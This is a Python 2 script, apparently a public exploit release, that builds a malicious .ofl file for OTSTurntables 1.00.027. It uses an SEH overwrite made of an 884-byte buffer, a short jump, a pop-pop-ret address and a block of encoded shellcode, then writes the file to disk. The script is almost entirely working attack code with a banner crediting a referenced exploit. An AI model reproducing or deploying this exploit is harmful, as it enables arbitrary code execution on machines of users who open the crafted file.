#usage: exploit.py #Open the exploit file from the program print "**************************************************************************" print " OTSTurntables 1.00.027 (.ofl) SEH Overwrite Exploit\n" print " Refer: milw0rm.com/exploits/8371" print " Tested on: Windows XP Pro SP2 Fr\n" print " Greetings to:" print " All friends & muslims HaCkers(dz)\n" print " Serra7 merra7,koulchi mderra7 :D\n" print "**************************************************************************" buffer = "\x41"*884 next_seh = "\xEB\x06\x41\x42" seh = "\x35\x2F\xC6\x72" #pop pop ret mscam shellcode=( "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34" "\x42\x50\x42\x30\x42\x50\x4b\x58\x45\x34\x4e\x33\x4b\x38\x4e\x57" "\x45\x30\x4a\x37\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48" "\x4f\x45\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x38" "\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c" "\x46\x47\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e" "\x46\x4f\x4b\x53\x46\x45\x46\x32\x46\x30\x45\x57\x45\x4e\x4b\x48" "\x4f\x55\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x50\x4b\x44" "\x4b\x58\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x4b\x38\x4e\x41\x4b\x48" "\x41\x30\x4b\x4e\x49\x58\x4e\x45\x46\x32\x46\x30\x43\x4c\x41\x33" "\x42\x4c\x46\x36\x4b\x38\x42\x54\x42\x33\x45\x48\x42\x4c\x4a\x37" "\x4e\x50\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x51\x4d\x4a" "\x4b\x48\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x48\x42\x4b" "\x42\x30\x42\x30\x42\x30\x4b\x38\x4a\x46\x4e\x43\x4f\x55\x41\x33" "\x48\x4f\x42\x56\x48\x55\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x47" "\x42\x55\x4a\x46\x42\x4f\x4c\x48\x46\x30\x4f\x35\x4a\x56\x4a\x49" "\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x46\x41\x56" "\x4e\x56\x43\x56\x42\x30\x5a") exploit = buffer + next_seh + seh + shellcode try: out_file = open("exploit.ofl",'w') out_file.write(exploit) out_file.close() raw_input("\nExploit file created!\n") except: print "Error"